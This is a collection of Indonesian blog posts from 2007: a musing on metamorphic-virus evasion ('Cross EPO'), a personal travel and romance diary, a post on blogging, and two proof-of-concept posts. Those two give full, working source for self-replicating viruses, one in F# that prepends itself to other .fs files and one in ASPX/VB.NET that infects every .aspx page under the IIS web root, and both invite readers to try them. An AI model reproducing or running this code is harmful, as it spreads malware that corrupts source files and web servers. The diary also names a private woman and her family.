” CROSS Entry Point Obscuring [CEPO™] ” Sentuhan kecil dari Kecerdasan Buatan
Sebenaranya konsep ini adalah pure ide, tanpa pembuktian yang konkrit, dan saya rasa ini memang cukup sulit untuk di realisasikan, namun, hal ini akan menjadi hal yang sangat berbahaya jika seseorang dapat membuktikan dan membawa konsep ini ke dunia pemrograman. Pernahkah anda mendengar tentang Polimorfisme, oligomorfisme atau metamorfisme dalam malicious software (malware/virus), ya memang teknik itu adalah teknik2 antidetection yang sering dipakai suatu virus computer, dimana setiap kali menginfeksi target, virus akan merubah dirinya sedemikian rupa, dengan maksud mengecoh teknik penditeksian dari antivirus yang masih memakai teknik diteksi “Hard Signature”. Namun akhir-akhir ini para pembuat virus lebih canggih lagi dengan menggabungkan konsep algoritma genetic dalam virusnya apa itu algoritma genetic ?, untuk lebih jelasnya lihat scenario sederhana yang saya buat ini :
“Natural selection” Itulah intri algoritma genetic, Sebelum menginfeksi virus akan mempelajari dulu target yang akan di Infeksi serta atmosfer dimana dia berada, lalu secara otomatis virus akan menghilangkan module2 yang sekiranya tidak berguna untuk dipakai, hal itu terus berlangsung sampai yang tersisa hanya inti dari program ( kebanyakan disebut Code DNA ).Dari sekian banyak teknik anti detection yang dipublikasikan tersebut, saya cenderung lebih tertarik kepada teknik Entry Point Obscuring / EPO, yang pertama kali diperkenalkan oleh GRIYO dari 29a Virus Group, teknik ini terlihat sederhana, namun sangat jenius menurut saya, lihat gambar berikut
Prinsip kerja :1. Virus membagi-bagi dirinya dalam beberapa modul
2. Sebelum menginfeksi virus akan merandom modul2 tersebut, sebelum di pisahkan untuk menginfeksi dengan teknik lapisan seperti gambar diatas
3. Virus juga mempunyai konstan parameter yang digunakan untuk mengurutkan modul2 yang akan bekerjaJika dilihat dari gambar diatas, maka banyaknya variant yang akan dihasilkan dari konsep EPO tersebut adalah :
Mod1,mod2,mod3,mod4,host,host,host,host -> 8!
= 8!
=8*7*6*5*4*3*2*1
= 40320 Variant virus
Dari sini saya mengembangkan kembali konsep dari griyo dimana saya mempunyai konsep sederhana yang saya berinama CROSS EPO dan mengklasifikasikannya menjadi bebearapa bagian.
CROSS EPO
Sebenarnya konsep dari cross EPO hampir sama dengan EP™O yang membedakan hanya, jika pada cross epo sendiri kita membagi modul2 tersebut menjadi 2 file yang berbeda, dimana suatu file tidak akan berfungsi tanpa menemukan pasangannya, saya memanggilnya yinyang module, disini saya membagi konsep ini dalam beberapa klasifikasi antara lain
MONOGENETIC CROSS EPO
HETERO GENETIC CROSS EPO
DUAL HETEROGENETIC CROSS EPO
MONOGENETIC CROSS EPO
HETERO GENETIC
DUAL HETERO GENETIC
Sangat rumit jika saya harus jelaskan satu persatu, namun jika pada DUAL HETERO GENETIC diatas jika kita dibuatkan rumus sederhana dimana virus dibagi menjadi 6 modul dan host juga dibagai 6 modul maka akan didapatkan rumus matematis sbb :Misal A : Modul virus, B : Modul host
Maka(A!/(A-6)!6! * B!/(B-0)!0!) + (A!/(A-5)!5! * B!/(B-1)!1!) + (A!/(A-4)!4! * B!/(B-2)!2!) + (A!/(A-3)!3! * B!/(B-3)!3!) + (A!/(A-2)!2! * B!/(B-4)!4!) + (A!/(A-1)!1! * B!/(B-5)!5!) +(A!/(A-0)!0! * B!/(B-6)!6!)= …Variant
?Maaf belum saya hitung, terakhir saya hitung memakai kalkulator di windows tidak dapat memuat semua hasilnya karena memang memory program kalkulator di windows juga terbatas.
Sekali lagi ini Cuma murni ide tanpa bukti konkrit, tapi apa salahnya kita waspada, jika suatu saat ada orang yang berhasil membuktikannya ? How this thing will gonna be ?, hehehe hueX
CERNA…
Perjalanan saya kemarin mengelilingi pulau Kalimantan akhirnya berakhir indah di samarinda, daerah yang keren abis dengan sungai mahakamnya, disanalah tempat saya bertemu gadis cantik berdarah bugis dan
Kalimantan bernama Cerna. Pertemuan saya dengannya tidak saya sangka sama sekali, selama 3 hari di Samarinda saya gunakan full waktu saya setelah bekerja hanya untuk bertemu dengan dia dengan berpura-pura berinternet sambil mencuri-curi pandang kearahnya, karena memang warnet itu milik keluarganya. Saya tidak akan pernah melupakannya seumur hidup saya, karena dia akhirnya saya merasakan indahnya jatuh cinta,alah
gaya :p.
17 Maret 2007 (Hari pertama – Pertemuan pertama)
Setelah bertolak dari banjarmasin menuju balikpapan, akhirnya saya sampai di samarinda sore pukul 5 WITA, tetapi di jam saya menunjukan pukul 4 WIB waktu Jakarta, saya memang tidak sempat merubah jam saya karena memang saya terlalu sibuk dengan pekerjaan.Namun sebelum masuk kedalam salah satu perumahan di samarinda bernama PANDAN HARUM HILL saya sempat melihat satu satunya warnet di daerah tsb, dalam hati “akhirnya ada juga warnet di Kalimantan”. Setelah sholat magrib saya langsung bergegas menuju warnet yang letaknya memang berada persis didepan perumahan yang saya tempati di samarinda “WARNET CW” namanya, mungkin nama itu diambil karena memang yang menjaga warnet tsb adalah 2 wanita cantik kakak beradik.
Setelah masuk, saya sempat bingung karena memang komputer di warnet tsb tidak banyak, mungkin hanya sekitar 6 PC, saya langsung masuk tanpa bertanya dan melihat ke samping sebelah kanan letak operator, hampir penuh ternyata, lalu saya bingung mau duduk dimana, saya memutar balik badan bermaksud menuju meja operator, setalah saya melihat meja operator, hal yang bertama saya lihat adalah mungkin hal terindah dalam hidup saya, saya sangat terpukau dengan penjaga warnet tersebut yang berambut panjang tergerai, cantik dan sederhana, mungkin ini yang namanya cinta pada pandangan pertama, selama didalam warnet saya jadi tidak konsentrasi dengan urusan pengiriman file untuk kantor saya PT.Pama Persada Di Jakarta, dalam hati, saya harus kenal dengannya setidaknya saya harus punya nomor telvonnya, kerena saya tidak ingin menyesal perjalanannya saya di samarinda sia-sia karena tidak bisa berkenalan dengannya. Waktu saya hanya tiga hari disini dan saya harus memanfaatkan waktu saya se sempurna mungkin untuk berkenalan dengannya, saya harus tahu namanya, nomor telvonnya keluarganya, dan semua tentang dia. Akhirnya karena memang waktu saya terbatas pada hari itu perjumpaan saya dengannya hanya sebentar saja, yang harus saya siapkan adalah strategi bagaimana cara saya besok untuk mengenalnya lebih jauh. Setelah membayar biaya rent warnet, lalu saya sengaja membuka pembicaraan dengannya dengan bertanya kepadanya, “khas dari samarinda itu apa yah mbak ?” lalu dia menjawab “aplak” atau apalah saya lupa namanya, saya pikir tidak apa-apa, untuk hari pertama ini saya hanya bisa tahu aplak yang terdengar dari bibirnya mungkin saja besok dia akan memberikan nomor telvonnya kepada saya heheh 
ngarep 
.
18 Maret 2007 ( Hari kedua – menggali informasi dari Yahya sang adik & dapat mengenalnya lebih jauh it’s a big step for next future )
Sejak dikantor saya sudah sangat tidak sabar untuk pulang dan bertemu dengannya lagi, akhirnya pukul 6 WITA setelah diantar sopir dari kantor akhirnya saya sampai juga di mes, dan setelah solat maghrib saya langsung secepat kilat menuju warnet itu lagi. Setelah sampai di warnet saya sempat kecewa karena saya tidak berjumpa dengannya, yang saya temui hanya anak kecil dimeja operator, oh tidak, gagal deh rencananya, tapi tidak apa-apa, mungkin anak ini adalah adiknya. Saya pikir dia masih dalam perjalan pulang atau sedang malem mingguan, karena memang waktu itu adalah malam minggu. Lalu saya dekati anak itu dan kami pun bicara panjang lebar, bercanda, dan ternyata benar dugaan saya, anak tersebut bernama Yahya, dan dia adalah adik dari kakaknya yang saya cari, CERNA namanya, saya dapat menggali informasi sangat banyak tentang Cerna dari yahya, mereka tiga bersaudara, WIDYA,CERNA dan YAHYA, WIDYA adalah anak sulung sama sepeti saya, WIDYA sudah punya pacar, dan ternyata pacarnya adalah IKSAN yang merupakan karyawan Labour Suply dari PT.PAMA Jobsite JEMBAYAN, CERNA adalah anak kedua, dari informasi yang saya dapat dari adiknya, CERNA sudah punya pacar juga, dan yang mengejutkan namanya sama dengan saya, FADLY yang katanya dia bekerja di BERAU daerah Kaltim juga. Saya juga sudah sempat melihat ibunya yang katanya orang Bugis, sama seperti nenek saya juga orang Bugis, dan ayahnya yang katanya orang samarinda namun saat itu saya tidak sempat berjumpa dengan sang ayah. Sambil bercanda dengan Yahya, saya sempat menanyakan nomor telvon kakaknya CERNA, tapi dia tidak tahu, dan saya sempat juga tanya friendsternya, tapi dia tidak tahu juga, aduh pusing…
Akhirnya setelah beberapa saat saya menunggu, datang juga sang kakak WIDYA dengan pacarnya IKSAN, awal bertemu dengan IKSAN saya sempat bertanya kepadanya, apa dia karyawan PAMA, dia jawab kalau dia Labour supply Pama, setelah beberapa saat kedatangan mereka berdua akhirnya datang juga yang saya tunggu-tunggu dari tadi, CERNA, memakai celana jeans dan baju belang hitam abu-abu, tampak tergesa-gesa mungkin dia takut di marahi ibunya karena pulang malam hehe kesian deh kamu. Cerna langsung masuk kedalam dan setelah beberapa saat dia balik lagi ke meja operator untuk mengggantikan Yahya sang adik dengan memakai baju putih bercelana pendek warna hitam, manis sekali.
Kira2 waktu itu pukul 10 malam disana, sambil menunggu saat yang tepat saya sempat membaca-baca wikipedia tentang RSA. Dan setelah kira2 pukul setengah sebelas, saya memberanikan diri untuk mendekatinya dengan metode numpang ngeprint. Disaat dia print itulah saya banyak bicara dengannya, kami sempat bercanda-canda, bertukar email dan friendster serta YM, dan tak lupa yang paling penting nomor telvon. Pada saat itu untuk printer warnet macet jadi sering warna yang ditampilkan agak buram, hal itulah yang mendasari saya beralibi untuk meminta dia menulis kembali memakai tangan hasil dari print out kertas yang tidak jelas, di saat dia menulis, saya gunakan waktu itu sebaik baiknya untuk memfotonya berkali-kali, awalnya dia menolak, namun memang saya sedikit memaksa akhirnya dia mau, saya memfotonya berkali kali dengan jepretan camera canon digital saya, cantik sekali. Kamipun sempat berfoto bersama mau lihat hasilnya ?
Sebenarnya masih banyak hasil jepretan saya namun belum saya copy semuanya kedalam laptop, saya sempat menanyakan nomor telvonnya, friendsternya, emailnya, YM-nya pokoknya semua telah berhasil saya dapatkan, saya sangat puas, namun saya sedikit kecewa karena kejadian ini hanya untuk hari ini saja, besok saya sudah harus balik ke balikpapan karena pesawat saya berangkat selasa 20 maret 2007 pagi pukul 9. Alasan utama yang paling membuat saya tidak ingin meninggalkan dia adalah karena tepat pada tanggal 25 maret, CERNA ulang tahun, sebenarnya saya ingin sekali memberi dia hadiah pada hari ultahnya, tapi apa daya, saya bukan presiden yang bisa meng-cancel jadwal penerbangan. Tetapi setidaknya saya bisa mengirimkan paket hadiah untuknya dari
jakarta, tunggu aja.
19 Maret 2007 ( Hari terakhir-Bye bye Cerna )
Inilah hari yang paling menyebalkan, ketika suatu langkah awal telah berhasil sempurna, namun tidak didukung oleh keadaan, damn. Sejak di kantor saya selalu terbayang-bayang wajah Cerna, kira-kira apa yah yang harus saya beli buat perpisahaan, sempet mau ke mall di daerah sana, tapi ga tau jalan, masak sih dia mau kalo saya kasih dia batubara milik Pama, hehe :p, yahh, akhirnya tidak ada yang saya beli buatnya, tapi saya pasti akan memberinya sesuatu pas hari ulang tahunnya.
Sepulang dari kantor saya sempat berkunjung sebentar ke warnet, namun hanya bertemu Widya, saya sempat kecewa, karena memang waktu saya disitu hanya sekitar 30 menit, sebelum driver taxi datang pukul 6.30 untuk membawa saya ke hotel bahtera di Balikpapan, saya tanya Widya, cerna mana ? Katanya lagi mandi, saya sempat menunggu namun ga muncul juga, ya sudah lah, saya langsung cabut aja, toh besok sampai
jakarta saya bisa menelvonnya, ya gak ? .
Oiya, sewaktu di perjalannya saya sempat membuka adobe photoshop di laptop, dan mengedit foto saya dengan Cerna, nih dia hasilnya :
mungkin semua keindahan itu takan terjadi tanpa bantuan sang adik Yahya, thanks ya bro
Dan sekarang saya telah kembali di
Jakarta, Dan kembali duduk di depan komputer saya di kantor,huuih, hari hari membosankan kembali datang.Damn
Cerna kalo kamu baca ini, kamu pasti ketawa, tapi ya itulah yang aku alami & rasakan
Kalo jodoh kita pasti ketemu lagi, ngarep 
Jakarta, March 21th 2007
F# SECURE ENOUGH ? NEW LANGUAGE BECOME NEW VIRUS
Mungkin jika ada orang asing yang menemukan judul ini di Internet akan kecewa
karena saya merilisnya memakai bahasa Indonesia tercinta, entah mengapa akhir-akhir
ini semangat nasionalisme saya tinggi sekali, hehehe mungkin karena sekarang saya
telah menjadi BLOGER kale hohohoh..
Microsoft Research Team said :
Combining the efficiency, scripting, strong typing and productivity of ML with the
stability, libraries, cross-language working and tools of .NET.
F# is a programming language that provides the much sought-after combination of
type safety, performance and scripting, with all the advantages of running on a
high-quality, well-supported modern runtime system
Now I said :
F# is a freak languange which developed by Microsoft Research Team, Having very bad structure, unfamiliar commands with poor documentation and stupid Error Handler.
Hohohoho Mudah2an saja saya tidak dipenjara karena teori diatas, tapi nyatanya memang
demikian, arsitektur F# sangat buruk menurut saya, sulit dipelajari dengan sangat amat
sedikit dokumentasi dari Internet, dan masih terdapat banyak bugs pada interpreternya
tapi dengan sedikit usaha dan kesabaran yang amat sangat sabar, akhirnya saya dapat
membuktikan bahwa F# juga bisa di simulasikan menjadi virus.
Apa Itu F# ?
F# (sebutnya F-Sharp) adalah suatu versi scripting dari variant Microsoft .NET based language
yang menurut saya adalah campuran dari C# dan OCaml programming language seperti CALM, mungkin juga LISP.
F# menurut saya sangat tidak bersahabat, karena saya akui memang jenis ini adalah variant baru dan sangat
sedikit sekali dokumentasinya di Internet,dan saya telah menghabiskan waktu hampir sebulan belajar F#
tapi itu bukan masalah, karena setidaknya saya menjadi lebih tau tentang F# dan saya telah membuktikan
bahwa F# pun bisa disimulasikan menjadi sebuah virus.
And this is the first(maybe) F# which able replicate and infect another F#
*****************************************************************
(* Mark *)
open System.IO
let vfile = new StreamReader(Sys.argv.(1));;
let vcode = (vfile.ReadToEnd()).Substring(0,526);;
let vclose = vfile.Close();;
let files = Directory.GetFiles(“.”,”*.fs”);; for i = 0 to files.Length-1 do
let hfile = new StreamReader(files.(i)) in
let hcode = hfile.ReadToEnd() in
let _ = hfile.Close() in
if (hcode.Substring(3,4)<>”Mark”) then begin
let hfile = new StreamWriter(files.(i)) in
let _ = hfile.Write(vcode+hcode) in
hfile.Close();
end
done
****************************************************************
1. Membuka System.IO bawaan .NET
2. Lalu membuka dan membaca bodi / kodenya sendiri
3. Mencari file *.fs lain di dalam direktori yang sama
4. Mengecek apa sudah terinfeksi sebelumnya
5. Jika belum Maka di Infeksi
Hohohohoh, Download F# disini
http://research.microsoft.com/projects/ilx/fsharp.aspx
Selamat mencoba…!!
INIKAH DUNIA BLOG ??
Sebenarnya saya mengenal konsep dari blog ini sudah cukup lama, kira2 SMA kelas 2 jadi kira2 6 tahun yang lalu saya sudah tau apa itu BLOg, namun waktu itu masih sangat sepi, tidak seramai sekarang,tapi sejak hari ini saya register account di wordpress dan melihat sudah banyak sekali blog2 bertebaran hohohohoh, dan ternyata blog rupanya sudah menjadi fenomena komunitas di alam maya yang sangat heterogen, terdiri dari berbagai macam tipe, jenis, style dan pastinya setiap blog mencerminkan pola pikir dan sifat pemiliknya.
Wuuuww sangat menarik, dan sangat amat menarik, barusan saya melihat postingan beberapa orang dengan tulisannya yang mengkritik orang lain, dan saya juga banyak melihat tulisan orang yang mungkin menurut saya *maaf menyimpang dan terkesan arogan, but what the hell, that is your style right ?? juga banyak sekali saya melihat BLOG ini dijadikan tempat menuangkan pikiran yang sangat amat bebas tanpa aturan sistem.
OK mungkin ini salah satu alasannya mengapa BLOG sangat berkembang pesat (selain friendster) , memang sangat masuk akal, suatu kita berada didalam komunitas yang diatur oleh sistem ( forum contohnya ) akan beda rasanya dengan komunitas yang free posts kaya Blog gini, namun sayangnya, ternyata ada sedikit fenomena dalam BLOG ini yang aga sedikit nyeleneh .
Barusan saya melihat ada beberapa blogger yang dalam tulisannya terkesan seperti
menghipnotis blogger lainnya untuk mengikuti pola pikirnya…ohohohoho
Saya ga tau nanti dampaknya jikalau pola pikir orang tersebut menyerupai Karl Marx
atau Hitler mungkin hohohoho atau bahkan mungkin Blog ini bisa dijadikan fasilitas oleh
PKI untuk menginfeksi otak blogger dan menyusun kekuatannya disini hohohoho…. (why not ?) tapi tenang aja lah ini hanya pemikiran kok, ga lebih.
Yang lebih menarik lagi, ada satu fenomena yang namanya SELEB BLOG hohohoho pertama
saya baca entah fenomena apalagi itu, setelah saya telusuri ternyata cuma small thing yang ga berguna tapi yang jelas saya jadi semakin tau apa itu blog dan mudah2an saya tidak menjadi bLoger yang Go-BLOG disini huhuhuh, ga kok becanda.
Ok saya rasa cukup sekian cuap-cuap saya hari, cukup lelah dengan 4 tulisan dalam sehari
hohohoho.
Mohon maaf apabila dalil2 saya disini tanpa dilengkapi oleh link karena memang saya pengguna baru BLOG, dan saya tidak ingin mendiskreditkan seseorang di RUMAH MAYA saya ini.
Salam hangat selalu dari Bekasi
.NET SECURE ENOUGH ? SEE THIS, MY ASPX REPLICATION CODE
Hohohohohooh
seiring dengan majunya teknologi microsoft maka makin maju
pula teknologi para coder hohohoh mungkin saya salah satunya wakwaw…
Lagi2 tentang pembuktian konsep atau sering disebut ”Proof Of concept” hehehe
I love that sentence, sounds cooL ya gag sih ??
Kemaren gua pusing banget ngerjain aplikasi pesenan
karena ke-MUMET-an gua kemaren akhirnya dateng lagi setan iseng di kepala gua.
gua nyoba2 apa bisa aspx replikasi ? soalnya pada ASp klasik gua dah nyoba dan ASP klasik ga begitu friendly buat replikasi, soalnya untuk baca
independendent path musti hardcode itupun juga harus membuat sendiri path lewat file DLL, Ok kemaren dalam waktu lumayan singkat
yang gua inget dari jam 2 abis makan siang sampe jam 4-an gw coding tuh program ASPX sejenis virus, dan akhirnya taraaaaa…… the first one ASPX virus maybe… hoho
—————————————————————————————–
<!– FADLY –>
<html>
<head>
<script language=”VB” runat=”server”>
Sub Page_Load (ByVal Sender As Object, ByVal E As EventArgs)
Try
Dim di As New System.IO.DirectoryInfo(“C:\Inetpub\wwwroot”)
Dim fiArr As System.IO.FileInfo() = di.GetFiles(“*.aspx”)
Dim fri As System.IO.FileInfo
Dim line, file_cont As String
Dim i,IsInf As Integer
Dim VirCode As String = “”
For Each fri In fiArr
Dim file_pointer As New System.IO.StreamReader(“C:\Inetpub\wwwroot\”+fri.Name)
Do
line = file_pointer.ReadLine()
file_cont=file_cont+line+Chr(13)+Chr(10)
Loop Until line Is Nothing
file_pointer.Close()
For i=0 to file_cont.Length-12
If file_cont.Substring(i, 12) = “<!”+”– FADLY –>” Then VirCode = file_cont.Substring(i-1, 1613)
Next
Next
For Each fri In fiArr
IsInf=0
file_cont=”"
Dim file_pointer As New System.IO.StreamReader(“C:\Inetpub\wwwroot\”+fri.Name)
Do
line = file_pointer.ReadLine()
file_cont=file_cont+line+Chr(13)+Chr(10)
Loop Until line Is Nothing
file_pointer.Close()
For i=0 to file_cont.Length-12
If file_cont.Substring(i, 12) = “<!”+”– FADLY –>” Then IsInf = 1
Next
If IsInf <> 1 Then
Dim file_pointerW As New System.IO.StreamWriter(“C:\Inetpub\wwwroot\”+fri.Name)
file_pointerW.WriteLine(VirCode+Chr(13)+Chr(10)+file_cont)
file_pointerW.Close()
i=file_cont.Length
End If
Next
Catch ex As Exception
End Try
End Sub
</script>
</head>
<body>
<p id=”ausgabe” runat=”server”></p>
</body>
</html>
—————————————————————————————–
Apaan tuh ??
Kode diatas adalah contoh dari aplikasi .NET aspx yang dapat mereplikasi dirinya sendiri ke file lain hohohoh mungkin orang nyebutnya virus, tapi tenang aja itupun prepender kok, no overwrite, jadi dia cuma numpang ( nitipin ) bodynya ke body file ASPX lain hohohohoho….
Dan satu lagi, kode diatas cuma sebagai pembuktian konsep dan teori dari gw kalo ga ada satupun sistem yang 100% aman, yang saya lakukan hanya membantu microsoft untuk menutupi lubang-lubang tersebut.Ok terima kasih dan..
selamat mencoba.
